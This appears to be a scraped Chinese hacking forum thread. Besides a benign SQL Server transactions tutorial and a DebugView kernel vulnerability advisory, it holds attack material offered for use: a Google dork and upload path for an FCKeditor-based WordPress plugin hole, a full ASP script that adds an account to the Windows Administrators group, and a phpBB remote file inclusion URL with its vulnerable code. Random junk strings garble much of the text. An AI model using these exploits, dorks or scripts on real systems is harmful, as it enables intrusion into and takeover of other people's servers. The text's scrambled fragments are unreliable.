Board logo

标题: 新主站板块更新!Google_Hack_Database [打印本页]

作者: pow78781    时间: 2011-11-29 13:03     标题: 新主站板块更新!Google_Hack_Database

Local_Root_Exploits模块添加,非安全中国网本次又增加新主站0模块——Google_Hack_Database,里面汇集我们精心挑选的google hacking语句让你黑路如虎添翼!! d* n1 y. y$ n
传送门:http://www.sitedirsec.com/ghdb/
作者: pcppp    时间: 2019-6-29 23:02

详解SQL Server对数据库事务处理
事务定义:
( x" s' J  O0 f& U' z
事务是单个的工作单元。如果某一事务成功,则在该事务中进行的所有数据更改均会提交,成为数据库中的永久组成部分。如果事务遇到错误且必须取消或回滚,则所有数据更改均被清除。
) N6 ^' V6 ]8 B
事务三种运行模式:自动提交事务每条单独的语句都是一个事务。显式事务每个事务均以 BEGIN TRANSACTION 语句显式开始,以 COMMIT 或 ROLLBACK 语句显式结束。隐性事务在前一个事务完成时新事务隐式启动,但每个事务仍以 COMMIT 或 ROLLBACK 语句显式完成。

3 e# g/ `  o2 M! H) I- k. c$ s
事务操作的语法:

) i) ?# T$ u' k1 G+ |+ n
BEGIN TRANSACTIONBEGIN DISTRIBUTED TRANSACTIONCOMMIT TRANSACTIONCOMMIT WORKROLLBACK WORKSAVE TRANSACTIONBEGIN TRANSACTION

- L. E$ v1 s- q0 M1 N/ i7 `
BEGIN TRANSACTION标记一个显式本地事务的起始点。
5 _9 s+ t6 x( w
BEGIN TRANSACTION将 @@TRANCOUNT 加 1。

0 j* _2 h( N, Z; S7 |
BEGIN TRANSACTION 代表一点,由连接引用的数据在该点是逻辑和物理上都一致的。如果遇上错误,在 BEGIN TRANSACTION 之后的所有数据改动都能进行回滚,以将数据返回到已知的一致状态 。每个事务继续执行直到它无误地完成并且用 COMMIT TRANSACTION 对数据库作永久的改动,或者遇上错误并且用 ROLLBACK TRANSACTION 语句擦除所有改动
8 M( H1 x, D) Q) ~+ Z) u, C) y
语法BEGIN TRAN [ SACTION ] [ transaction_name | @tran_name_variable [ WITH MARK [ ’description’ ] ] ]

4 R, B# z3 u2 D( R0 |2 Q. Y& j
例子:BEGIN TRAN T1UPDATE table1 ...--nest transaction M2BEGIN TRAN M2 WITH MARKUPDATE table2 ...SELECT * from table1COMMIT TRAN M2UPDATE table3 ...COMMIT TRAN T1
% q, w/ |! n! r2 \) v5 U4 w$ k
BEGIN DISTRIBUTED TRANSACTION指定一个由 Microsoft 分布式事务处理协调器 (MS DTC) 管理的 Transact-SQL 分布式事务的起始。

4 p6 x! E+ F$ Y0 V9 N& H
语法BEGIN DISTRIBUTED TRAN [ SACTION ][ transaction_name | @tran_name_variable ]

6 J- [; ]- w) ^4 \2 L' ^5 N
参数transaction_name是用户定义的事务名,用于跟踪 MS DTC 实用工具中的分布式事务。 transaction_name 必须符合标识符规则,但是仅使用头 32 个字符

( _3 c+ k' X( s$ P! Z) Y
@tran_name_variable是用户定义的一个变量名,它含有一个事务名,该事务名用于跟踪 MS DTC 实用工具中的分布式事务。必须用 char、varchar、nchar 或 nvarchar 数据类型声明该变量。

( t8 s& m3 Z4 i' b+ w. A
注释执行BEGIN DISTRIBUTED TRANSACTION 语句的服务器是事务创建人,并且控制事务的完成
  W( o& i6 V0 ~6 a2 S) A/ c
当连接发出后续 COMMIT TRANSACTION 或 ROLLBACK TRANSACTION 语句时,主控服务器请求 MS DTC 在所涉及的服务器间管理分布式事务的完成。
, g, z1 e- x) V) S* ~
有两个方法可将远程 SQL 服务器登记在一个分布式事务中:分布式事务中已登记的连接执行一个远程存储过程调用,该调用引用一个远程服务器。分布式事务中已登记的连接执行一个分布式查询,该查询引用一个远程服务器。
6 q$ {+ R7 I% z* D: f; r  |
示例本例在本地和远程数据库上更新作者的姓。本地和远程数据库将同时提交或同时回滚本事务。
3 T) e, a: }3 J  l
说明当前的SQL Server 上必须安装 MS DTC.

) h3 L- d' [* T6 X
USE pubsGOBEGIN DISTRIBUTED TRANSACTIONUPDATE authorsSET au_lname = ’McDonald’ WHERE au_id = ’409-56-7008’EXECUTE link_Server_T.pubs.dbo.changeauth_lname ’409-56-7008’,’McDonald’COMMIT TRANGONote:如果需要连接远程DB,如果是linkServer 方式连接的话,一定要修该linkServer的 RPC 选项置为 True。
8 `: i# A* ~  P4 Z9 x5 T, J
SET XACT_ABORT指定当 Transact-SQL 语句产生运行时错误时,Microsoft? SQL Server? 是否自动回滚当前事务。

0 T1 D: c) H8 }7 I6 L; Z" }* ?
( 可以比较简单的理解,如果中间有任何一句SQL 出错,所有SQL全部回滚.特别适用于 Procedure 中间调用Procedure ,如果第一个Procedure Ok,被调用的Procedure 中间有错误,如果SET XACT_ABORT=false,则出错的部分回滚,其他部分提交,当然外部Procedure 也提交。).

& l4 w. Z4 Z* ?6 |
---在分布式Trans中一定要注意设置下面参数(XACT_ABORT)

& L9 x5 q: o$ E0 P0 H4 r! w) P
语法SET XACT_ABORT { ON | OFF }
) s! d1 D1 y. S, y5 l! C0 r# X
注释 当 SET XACT_ABORT 为 ON 时,如果 Transact-SQL 语句产生运行时错误,整个事务将终止并回滚。为 OFF 时,只回滚产生错误的Transact-SQL 语句,而事务将继续进行处理。编译错误(如语法错误)不受 SET XACT_ABORT 的影响。

4 f/ E0 H8 G# l+ R& l5 m
对于大多数 OLE DB 提供程序(包括 SQL Server),隐性或显式事务中的数据修改语句必须将 XACT_ABORT 设置为 ON。
+ @# {  o. m0 q2 A. ], ~/ \( m& b% e
SET XACT_ABORT 的设置是在执行或运行时设置,而不是在分析时设置。

5 o. A1 }4 @' [# ?1 q
示例 下例导致在含有其它 Transact-SQL 语句的事务中发生违反外键错误。在第一个语句集中产生错误,但其它语句均成功执行且事务成功提交。在第二个语句集中,SET XACT_ABORT 设置为 ON。这导致语句错误使批处理终止,并使事务回滚。
1 q- W% L& [" @
CREATE TABLE t1 (a int PRIMARY KEY)CREATE TABLE t2 (a int REFERENCES t1(a))GOINSERT INTO t1 VALUES (1)INSERT INTO t1 VALUES (3)INSERT INTO t1 VALUES (4)INSERT INTO t1 VALUES (6)GOSET XACT_ABORT OFFGOBEGIN TRANINSERT INTO t2 VALUES (1)INSERT INTO t2 VALUES (2) /* Foreign key error */INSERT INTO t2 VALUES (3)COMMIT TRANGO

5 d) s& c7 T9 P$ i( q- a9 u$ r
SET XACT_ABORT ONGO

5 ~; P" `( ]; [$ S* V4 S% n0 A
BEGIN TRANINSERT INTO t2 VALUES (4)INSERT INTO t2 VALUES (5) /* Foreign key error */INSERT INTO t2 VALUES (6)COMMIT TRANGO

) F: W! {( k4 y/ e
SAVE TRANSACTION在事务内设置保存点。

6 j6 p' o. z% t# ]' V% C" M, A3 v
语法 SAVE TRAN [ SACTION ] { savepoint_name | @savepoint_variable }参数 savepoint_name 是指派给保存点的名称。保存点名称必须符合标识符规则,但只使用前 32 个字符。@savepoint_variable 是用户定义的、含有有效保存点名称的变量的名称。必须用 char、varchar、nchar 或 nvarchar 数据类型声明该变量。 注释用户可以在事务内设置保存点或标记。保存点定义如果有条件地取消事务的一部分,事 务可以返回的位置。如果将事务回滚到保存点,则必须(如果需要,使用更多的 Transact-SQL 语句和 COMMIT TRANSACTION 语句)继续完成事务,或者必须(通过将事务回滚到其起始点)完全取消事务。若要取消整个事务,请使用 ROLLBACK TRANSACTION transaction_name 格式。这将撤消事务的所 有语句和过程。

" o* y. n; H$ w7 V# b# v
Note:1: 在由 BEGIN DISTRIBUTED TRANSACTION 显式启动或从本地事务升级而来的分布式事务中,不支持 SAVE TRANSACTION。2:当事务开始时,将一直控制事务中所使用的资源直到事务完成(也就是锁定)。当将事务的一部分回滚到保存点时,将继续控制资源直到事务完成(或者回滚全部事务)。

9 m  F. j0 q8 T  m. Y3 G
例子:begin transactionsave transaction Ainsert into demo values(’BB’,’B term’)rollback TRANSACTION Acreate table demo2(name varchar(10),age int)insert into demo2(name,age) values(’lis’,1)commit transaction
5 s5 t9 q, L' g; Y+ o8 z
ROLLBACK TRANSACTION
3 m7 a+ k5 {8 S! T
将显式事务或隐性事务回滚到事务的起点或事务内的某个保存点。语法ROLLBACK [ TRAN [ SACTION ][ transaction_name | @tran_name_variable | savepoint_name | @savepoint_variable ] ]

, L$ ~) ]/ X, G3 w2 ~
参数transaction_name是给 BEGIN TRANSACTION 上的事务指派的名称。transaction_name 必须符合标识符规则,但只使用事务名称的前 32 个字符。嵌套事务时,transaction_name 必须是来自最远的 BEGIN TRANSACTION 语句的名称。@tran_name_variable是用户定义的、含有有效事务名称的变量的名称。必须用 char、varchar、nchar 或 nvarchar 数据类型声明该变量。savepoint_name是来自 SAVE TRANSACTION 语句的 savepoint_name。savepoint_name 必须符合标识符规则。当条件回滚只影响事务的一部分时使 用 savepoint_name。@savepoint_variable是用户定义的、含有有效保存点名称的变量的名称。必须用 char、varchar、nchar 或 nvarchar 数据类型声明该变量。

# `! t  N( y* {
注释 ROLLBACK TRANSACTION 清除自事务的起点或到某个保存点所做的所有数据修改。ROLLBACK 还释放由事务控制的资源。不带 savepoint_name 和 transaction_name 的 ROLLBACK TRANSACTION 回滚到事务的起点。嵌套事务时,该语句将所有内层事务回滚到 最远的 BEGIN TRANSACTION 语句。在这两种情况下,ROLLBACK TRANSACTION 均将 @@TRANCOUNT 系统函数减为 0。ROLLBACKTRANSACTION savepoint_name 不减少 @@TRANCOUNT。

% c: P( ^0 y4 s/ Z" p( j
Note:ROLLBACK TRANSACTION 语句若指定 savepoint_name 则不释放任何锁。在由 BEGIN DISTRIBUTED TRANSACTION 显式启动或从本地事务升级而来的分布式事务中,ROLLBACK TRANSACTION 不能引用savepoint_name。在执行 COMMIT TRANSACTION 语句后不能回滚事务。
  D+ N! m5 c9 i9 ], i; }, e9 C4 Y
在事务内允许有重复的保存点名称,但 ROLLBACK TRANSACTION 若使用重复的保存点名称,则只回滚到最近的使用该保存点名称的SAVE TRANSACTION。
" h* t2 C: U/ d5 I
在存储过程中,不带 savepoint_name 和 transaction_name 的 ROLLBACK TRANSACTION 语句将所有语句回滚到最远的 BEGINTRANSACTION。在存储过程中,ROLLBACK TRANSACTION 语句使 @@TRANCOUNT 在触发器完成时的值不同于调用该存储过程时的@@TRANCOUNT 值,并且生成一个信息。该信息不影响后面的处理。

* p1 j& T& q1 y+ j, r0 I" i
如果在触发器中发出 ROLLBACK TRANSACTION:将回滚对当前事务中的那一点所做的所有数据修改,包括触发器所做的修改。触发器继续执行 ROLLBACK 语句之后的所有其余语句。如果这些语句中的任意语句修改数据,则不回滚这些修改。执行其余的语句不会激发嵌套触发器。在批处理中,不执行所有位于激发触发器的语句之后的语句。每次进入触发器,@@TRANCOUNT 就增加 1,即使在自动提交模式下也是如此。(系统将触发器视作隐性嵌套事务。)

( n5 ^$ C4 l+ r- s3 f0 \  t1 L( V; ~
在存储过程中,ROLLBACK TRANSACTION 语句不影响调用该过程的批处理中的后续语句;将执行批处理中的后续语句。在触发器中,ROLLBACK TRANSACTION 语句终止含有激发触发器的语句的批处理;不执行批处理中的后续语句。
& {+ [/ \, Q7 Y
ROLLBACK TRANSACTION 语句不生成显示给用户的信息。如果在存储过程或触发器中需要警告,请使用 RAISERROR 或 PRINT 语句。RAISERROR 是用于指出错误的首选语句。

8 W3 O- ^  o3 ]0 D& D5 }# n, t
ROLLBACK 对游标的影响由下面三个规则定义:当 CURSOR_CLOSE_ON_COMMIT 设置为 ON 时,ROLLBACK 关闭但不释放所有打开的游标。当 CURSOR_CLOSE_ON_COMMIT 设置为 OFF 时,ROLLBACK 不影响任何打开的同步 STATIC 或 INSENSITIVE 游标不影响已完全填充的异步 STATIC 游标。将关闭但不释放任何其它类型的打开的游标。对于导致终止批处理并生成内部回滚的错误,将释放在含有该错误语句的批处理内声明的所有游标。不论游标的类型或 CURSOR_CLOSE_ON_COMMIT 的设置,所有游标均将被释放,其中包括在该错误批处理所调用的存储过程内声明的游标。在该错误批处理之前的批处理内声明的游标以规则 1 和 2 为准。死锁错误就属于这类错误。在触发器中发出的 ROLLBACK 语句也 自动生成这类错误。

# m3 `- W. }/ f9 T( k4 ~
权限ROLLBACK TRANSACTION 权限默认授予任何有效用户。例子:

# U7 {9 l9 {9 S
begin transactionsave transaction Ainsert into demo values(’BB’,’B term’)rollback TRANSACTION A
( W! l6 N2 m6 ~& ~8 c& e
-- select * into demo2 from demo1
6 g  w" H5 U; W  n8 q* c2 q
create table demo2(name varchar(10),age int)insert into demo2(name,age) values(’lis’,1)rollback transaction
1 L/ N+ s0 F8 L7 N7 l3 \5 z
COMMIT TRANSACTION标志一个成功的隐性事务或用户定义事务的结束。如果 @@TRANCOUNT 为 1,COMMIT
$ V9 J8 @0 d: O: g7 c0 e% O
TRANSACTION 使得自从事务开始以来所执行的 所有数据修改成为数据库的永久部分,释放连接占用的资源,并将 @@TRANCOUNT 减少到 0。如果@@TRANCOUNT 大于 1,则COMMIT

6 X3 Z8 _5 a0 T3 w9 n0 g
TRANSACTION 使 @@TRANCOUNT 按 1 递减。
: A5 k: v; x1 J& x7 m
只有当事务所引用的所有数据的逻辑都正确时,发出 COMMIT TRANSACTION 命令。COMMIT WORK标志事务的结束。语法COMMIT [ WORK ]

' W: C: ]  e; ^1 w$ Y8 y$ I5 ~
注释此语句的功能与 COMMIT TRANSACTION 相同,但 COMMIT TRANSACTION 接受用户定义的事务

. Z' F9 Y2 G. D/ P) e! ?
名称。这个指定或没有指定可选关键字WORK 的 COMMIT 语法与 SQL-92 兼容
6 o* G* t$ e6 p% B7 ^1 j5 u  d. X
例子:begin transaction ainsert into demo values(’BB’,’B term’)commit TRANSACTION A
, r1 A7 z# |3 a2 a4 C* I9 F
隐性事务当连接以隐性事务模式进行操作时,SQL Server将在提交或回滚当前事务后自动启动新事务。无须描述事务的开始,只需提交或回滚每个事务。隐性事务模式生成连续的事务链。

$ w! n* E- E. t' U: Y
在为连接将隐性事务模式设置为打开之后,当 SQL Server 首次执行下列任何语句时,都会自动启动一个事务:
/ b1 A* l; l* @9 z  t
  ALTER TABLE  INSERT
/ A% q% U7 w) G4 j1 d
CREATE OPEN
  T3 O: ?, o3 J  w
DELETE REVOKE
& l, p0 Q" d& Y; Y+ Y; @0 e3 O
DROP SELECT
5 D" j7 g: m) ]9 O; Z9 ^
FETCH TRUNCATE TABLE
6 ^4 ?; Z% {- m1 B' `
GRANT UPDATE
3 w( A" |4 x' L8 g$ I
在发出 COMMIT 或 ROLLBACK 语句之前,该事务将一直保持有效。在第一个事务被提交或回滚之后,下次当连接执行这些语句中的任何语句时,SQL Server 都将自动启动一个新事务。SQL Server 将不断地生成一个隐性事务链,直到隐性事务模式关闭为止。
# q9 L. X1 T1 x! G0 J( y
例子:begin transactionsave transaction A

/ t* _" B5 a% |& p
insert into demo values(’BB’,’B term’)rollback TRANSACTION A
' F" Z/ \, S; |) E- o: ~8 C
create table demo2(name varchar(10),age int)insert into demo2(name,age) values(’lis’,1)rollback transaction-- 在 Create table demo2 时 SQL Server 已经隐式创建一个Trans,知道提交或回滚

6 C( @2 H8 k% C6 |0 r; |0 e
嵌套事务处理:
- M9 l% m  e0 A0 s* p+ u
1:Trans 嵌套,将内部的trans 合并到外部并形成一个Trans.

+ W+ V4 x6 l/ L  Q/ t! `; w" u
begin tran t1

0 H  }( v* z; j" @# H/ q
----In the first trans .Insert into demo2(name,age) values(’lis’,1)
! {* V' W3 |& w6 H
---Second Trans begin transaction t2insert into demo values(’BB’,’B term’)commit transaction t2
3 [1 `, @7 u0 `3 R2 W' G+ V$ N
----In the first trans .Insert into demo2(name,age) values(’lis’,2)rollback transaction t1

# ], U9 |/ m, q1 [$ j1 j
Note:

& T! q: f) Y+ P- P, v: h
在一系列嵌套的事务中用一个事务名给多个事务命名对该事务没有什么影响。系统仅登记第一个(最外部的)事务名。回滚到其它任何名字(有效的保存点名除外)都会产生错误。事实上,任何在回滚之前执行的语句都没有在错误发生时回滚。这语句仅当外层的事务回滚时才会进行回滚。
8 r# L/ G( e2 M; ^' [
例:内部事务回滚SQL server 报错。

; |( _$ U; t5 ^
begin tran t1Insert into demo2(name,age) values(’lis’,1)---Second Trans
0 L# f% h0 `) d8 s
--Server: Msg 6401, Level 16, State 1, Line 6---Cannot roll back t2. No transaction or savepoint of that name was found.begin transaction t2insert into demo values(’BB’,’B term’)rollback transaction t2

5 d! e! x. X8 Z4 p' K  _
----In the first trans .Insert into demo2(name,age) values(’lis’,2)commit transaction t1

3 D0 K0 W! W4 j* B1 M
例: 内部事务提交SQL server 不会报错。
+ e0 a' r) @5 L' C/ `9 Z
begin tran t1Insert into demo2(name,age) values(’lis’,1)---Second Trans no errorbegin transaction t2insert into demo values(’BB’,’B term’)commit transaction t2
9 I4 ^# A9 J6 f; C+ T; w
----In the first trans .Insert into demo2(name,age) values(’lis’,2)commit transaction t1
1 L* D( a( u9 E# Q4 _/ e5 ~+ Y
SQL Server 的隔离级别:

+ D# [- V* {, T. O8 L8 R
1: 设置TimeOut 参数

" y* J* H! g9 J; ~
Set Lock_TimeOut 5000

  P1 ~6 t4 _1 S" w' E
被锁超时5秒将自动解锁

6 k1 V/ o1 ?9 L5 r6 F1 \
Set Lock_TimeOut 0
" J2 U# y$ X0 F' j4 f; K
产立即解锁,返回Error 默认为-1,无限等待

5 S( r$ O+ J# `! w( w4 o
2:
5 h+ M& ^4 ^5 m! z) s8 y; m5 F
(SET TRANSACTION ISOLATION LEVEL{ READ COMMITTED| READ UNCOMMITTED| REPEATABLE READ | SERIALIZABLE})

, E0 ]& s* N9 Q' C
READ COMMITTED

6 _3 f4 S  \1 {: i
指定在读取数据时控制共享锁以避免脏读,但数据可在事务结束前更改,从而产生不可重复读取或幻像数据。该选项是SQL Server 的默认值。

: z: ~/ u7 F& b" \, C4 R2 z! l6 k8 `
避免脏读,并在其他session 在事务中不能对已有数据进行修改。共享锁。
: x9 P4 x6 Z$ J2 q% i
READ UNCOMMITTED

7 _6 U7 B% _! K8 y- C' i5 q
执行脏读或 0 级隔离锁定,这表示不发出共享锁,也不接受排它锁。当设置该选项时,可以对数据执行未提交读或脏读;在事务结束前可以更改数据内的数值,行也可以出现在数据集中或从数据集消失。该选项的作用与在事务内所有语句中的所有表上设置 NOLOCK 相同。这是四个隔离级别中限制最小的级别。
. M: M5 ~( M7 I  Z8 J7 @8 G
REPEATABLE READ

" ^7 \' W( {% f/ F; d9 K% g7 T. D3 \
锁定查询中使用的所有数据以防止其他用户更新数据,但是其他用户可以将新的幻像行插入数据集,且幻像行包括在当前事务的后续读取中。因为并发低于默认隔离级别,所以应只在必要时才使用该选项。
) t. Y7 q  @- Z5 K: _: {
SERIALIZABLE
$ F# _7 J8 |# \) O8 ?6 T2 Y
在数据集上放置一个范围锁,以防止其他用户在事务完成之前更新数据集或将行插入数据集内。这是四个隔离级别中限制最大的级别。因为并发级别较低,所以应只在必要时才使用该选项。该选项的作用与在事务内所有 SELECT 语句中的所有表上设置 HOLDLOCK 相同。
) J3 \0 W; C6 z# ?; y* U1 F
0 I6 Q! R4 i# }8 e

8 J# ]4 g- i4 @
$ M' m3 ^; E+ |7 L7 _& Y& }2 V0 Y6 v" P9 c) P2 Y% t9 Q

* r2 P+ b) K8 V
- x" o0 h; f0 y% T3 u+ M+ ^; l: ~* I8 b' B0 M3 ^! ?3 c
  w5 ]/ u$ ~2 a- H; }( |

9 j/ E: {* U* R8 b
- ^1 T& v3 S) o7 m) l5 b; |+ W1 G6 J
* j% P! ~+ Q* W( _. p9 v. W
' j) y+ X2 D0 W% n7 K9 n# L

: R4 k! @6 R, c3 e; ]0 W, P3 Z- B7 d3 H2 t9 M8 I
2 g7 \1 _4 G- I- w7 j; _$ i

" u! ]2 X8 {1 w" E  q1 Y4 x3 W
9 D" S9 O, {3 f' n0 P* f4 [! t2 K公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: 路过    时间: 2019-7-25 23:01

微软 DebugView Dbgv.sys内核模块本地权限升漏洞
受影响系统:Microsoft DebugView 4.64
0 D& `; d/ e2 q- g/ j3 {
不受影响系统:Microsoft DebugView 4.72
) i% U; d3 ?- P# B) R
描述:
) f, |$ P6 l# y9 a
CVE(CAN) ID: CVE-2007-4223

) @" V6 x4 h3 O' i3 g& I* J& V
DebugView允许用户监控本地系统或可通过TCP/IP访问的网络中计算机上的调试输出。
3 ^7 a' H4 C5 L; p. j
DebugView所加载的Dbgv.sys内核模块中的功能可能允许将用户提供的数据拷贝到内核中可控的地址,这样恶意用户就可以向运行的内核中注入任意代码。

, X: I: O6 m, N7 `3 i; k$ d* n8 w" v
如果要利用这个漏洞,管理员必须加载DebugView,这样才会将Dbgv.sys驱动加载到内核,然后所有用户在系统重启之前都可以访问有漏洞的内核模块。
# q4 a' X9 g9 s$ j
厂商补丁:

- |( L6 n2 V: q4 Y
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
2 k' s' t' ?& [3 Z
http://download.sysinternals.com/Files/DebugView.zip

( i% S$ X9 I7 I, g2 H6 Z  ^9 ~( [* _* L+ g
0 k9 c% I, x# |$ M2 _

* e  `' q: }) t7 Y7 v2 U
! L$ p) b; W$ w# L) _" H3 Z/ o& S' n1 f. i

! V+ O: g" M4 M) {' [9 Z5 v5 b# {9 `1 @
3 s* p! T5 W) g+ _( v
6 `  k4 J, H, s, V1 w7 s" C

: Z+ w$ z  [7 t& O9 V- j
& @, c. b# I' ~  L; j
  |  U  J+ z$ o1 C+ R& _4 Y5 b" \- {
" E: Q" Y5 |+ C6 r( j& N3 H
8 [6 C8 R9 R3 v" z+ D

: W7 u1 d. y1 Y( s. x8 h, X2 x# e
2 \2 p9 P1 B" z- X. h% I+ |. O9 R. z0 z' m' t) e, ~  e' O, Q1 A
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: pcppp    时间: 2019-8-2 23:20

WordPress插件EditorMonkey上传漏洞
WordPress插件EditorMonkey存在上传漏洞。用WINDOWS2003
8 n$ `) Q) \& d2 P  j! ~ ! l0 Y: v" |/ Z1 x6 }
系统的请注意哦。这漏洞也就是fckeditor的上传洞。
" t2 g/ ~$ D# j3 B. l8 R  s, ?4 i漏洞测试如下:6 u4 h. X8 F5 |9 F# A( A

7 f) W/ s6 E3 q( L& p6 P/ M/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html - k/ C0 z+ I7 Y$ z2 P2 w" p0 @
, x8 F$ I9 t- v; j
上传什么文件大家多懂的。上传后文件在/UserFiles/你的文件名3 \$ N6 X8 S# k0 M0 Q3 |1 B

$ O; a8 n7 L* K  n7 b% H5 D谷歌搜索一下,好多用这插件的博客。9 z+ O2 C6 a" X

+ [9 q% C, J6 W' j' G/ E) Q) f0 U关键字:wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
. ~/ k, L9 f! \! t9 T4 X6 u- g5 W2 V4 z( f

! E! H$ O, R7 G
( J. i: n8 D* I" G! a8 ]% k9 O6 `' B! S: ]/ A. X4 m* F) G/ z
, d& d2 i( u8 a5 N
4 h, O1 ^9 ~1 X0 K' d1 r
+ ]5 \) }6 `' P, o6 V# c5 u; I3 A

; |- X  Q" j( W, L. ]& u. d& [
0 h) f' M7 s) n+ I# A9 r9 U( k

3 P0 x/ E1 n, q1 Z( \# _  R- n4 X+ D- g: G  d9 j

/ z1 a. Y: q$ f2 u  N# I8 k' x! n( p& `
" s- i/ o0 ]2 O7 S
9 H# V# u& ^4 D+ w1 e
$ o! E* o. W! ]2 M) j. C

( ~+ Y1 r. s0 K- F6 Y* ?公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: gaoqun2    时间: 2019-9-9 23:01

用ASP代码添加超级用户——asp提权时用
在user权限下成功添加Administrators组的用户反正代码是对的,但是很少能成功,具体的看运气了。。
% J; u! U9 B$ ]% c9 @) m* K& \% b- H
[/quote]
. n5 [" e, s4 D  t! D* j[quote]<head>.network对象脚本权限提升漏洞利用工具</head><form action="useradd.asp" method=post>用户:<input name="username" type="text" value="kevin1986"><br>密码:<input name="passwd" type="password"><br><input type="submit" Value="添 加"></form>
3 O( Y0 K0 l1 F. Y+ _9 s
<%@codepage=936%><%on error resume nextif request.servervariables("REMOTE_ADDR")<>"127.0.0.1" thenresponse.write "iP !s n0T RiGHt"elseif request("username")<>"" thenusername=request("username")passwd=request("passwd")Response.Expires=0Session.TimeOut=50Server.ScriptTimeout=3000set lp=Server.CreateObject("WSCRIPT.NETWORK")oz="WinNT://"&amp;lp.ComputerNameSet ob=GetObject(oz)Set oe=GetObject(oz&amp;"/Administrators,group")Set od=ob.Create("user",username)od.SetPassword passwdod.SetInfooe.Add oz&amp;"/"&amp;usernameif err thenresponse.write "哎~~今天你还是别买6+1了……省下2元钱买瓶可乐也好……"elseif instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&amp;username.stdout.readall),"上次登录")>0 thenresponse.write "虽然没有错误,但是好象也没建立成功.你一定很郁闷吧"elseResponse.write "OMG!"&amp;username&amp;"帐号居然成了!这可是未知漏洞啊.5,000,000RMB是你的了"end ifend ifelseresponse.write "请输入输入用户名"end ifend if%>
1 D7 s/ `* C9 u* y7 \- ~
: o. g- O( j' A2 h6 \2 y
. |- e' }+ F0 w9 b

3 z; w$ O5 e6 o+ l8 ^! z
! f7 C& [7 ^" n* {* a& W, L3 R# B% Y, K/ @
8 _+ l3 y2 S" b" I3 A% y8 ?* {. z, m
# S% l- Y' Y, K0 Q) O

: R3 s6 j7 @% V3 W8 i7 T" b9 X+ q5 ]  e- H% N" W
5 e% H7 [( Y: [) [

/ g* W8 L2 a& f4 W) i4 I% ?$ l* Y$ ?1 p9 C* X' K8 l1 X2 S
  Y# E  P2 S" j

" r) ?5 ^$ W: B; M7 B1 C' ?
$ @1 P- D& m  h" W. G; }+ ?+ z3 \3 V/ q+ T1 C8 ~  X* f% O9 F

5 I, J3 w) m* ~6 P3 M0 V3 @7 H8 \% ~* A1 o% R2 P
公告:https://www.sitedirsec.com公布最新漏洞,请关注
作者: arja    时间: 2019-10-31 23:01

phpBB 3 远程文件包含漏洞
phpBB 3 (autopost bot mod <= 0.1.3) Remote File Include VulnerabilityVulnerability author: KacperGreetz: all DEVIL TEAM forum members.Author Website: http://devilteam.pl/                http://polskihacking.pl/Mod Description:This mod automatically post content from RSS feed into destination forum.MOD Download: http://phpbb3.smika.net/Demo: http://phpbb3.smika.netdont work when php5 or newest.Vulnerability:http://site.cz/forum_path/includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&amp;phpbb_root_path=[evil_code]------------------------------------------------------------------Bad codE:includes/functions_lastrss_autopost.php - line 204 - 240:
  1. if($config['lastrss_ap_enabled'])                                        <-----{1}{  // init &amp; setup lastrss  // $rss can be already initiated by lastRSS agregator mod by SmiX  if(!isset($rss))                                                       <-----{2}  {    require $phpbb_root_path . 'includes/class_lastrss.' . $phpEx;                                   <-----{3}    $rss = new lastrss;   }  // init/change settings for lastrss autopost bot  $rss->cache_time = 0;                                         // not used in this mod  $rss->items_limit = $config['lastrss_ap_items_limit'];        // default limit of items to post  $rss->type = $config['lastrss_type'];                         // connection type (fopen / curl)  // init lastRSS autopost MOD !  // check if we have some feeds in database to check  $sql = 'SELECT *      FROM ' . LASTRSS_AP_TABLE . '      WHERE next_check < "' . time() . '" AND enabled = "1"';  $result = $db->sql_query($sql);$row = $db->sql_fetchrow($result);$db->sql_freeresult($result);  // so do we have some feeds to post ?  if(sizeof($row) > 0)  {    // we are already sure, that at least one feed exists!    $feed = get_next_feed_to_post();   }  // do we have some feed data ?  if (isset($feed) &amp;&amp; (sizeof($feed) > 0))  {      // we are sure, we have feed info for checking the feed!    autopost_init($feed);  }}?>
复制代码
------------------------------------------------------------------Zapraszam na forum DEVIL TEAM, google:"DEVIL TEAM" lub http://6189.pl, http://devilteam.pl" O  w6 o. U1 j6 |9 R

% y. S) u. U1 O. v# n$ d! P% V$ e0 q& S2 ?
7 d+ ]# x( ?1 U- H2 ~
2 ?5 I  c, c. H7 V5 |* H

% T1 @6 k. u: R" S: g0 R9 D: T& w; P; G! J. c; S
: W5 R% }. i5 {  {

# y" D& W& u+ u8 {( R; Q6 m: P8 s9 f* }& d+ O3 ~0 h" v2 k  p# [3 r
. T3 I1 }% m/ F9 {, N$ M, W
2 X9 O& p; X2 R7 j4 n: d

; N7 \& S" o8 h+ P+ S" N# u5 g+ E; d3 \+ E- l

' o) ^+ C) O. P9 u) N/ W9 s$ c
1 o" ~, a. D, |3 r1 I0 e) _( z' U2 _( I# ^

; k5 |5 q' K$ z" D3 F7 p
; k" S8 |" @" h+ m" O公告:https://www.sitedirsec.com公布最新漏洞,请关注




欢迎光临 非安全中国网-官方论坛{sitedirsec} (http://www.sitedirsec.com/) Powered by Discuz! 7.2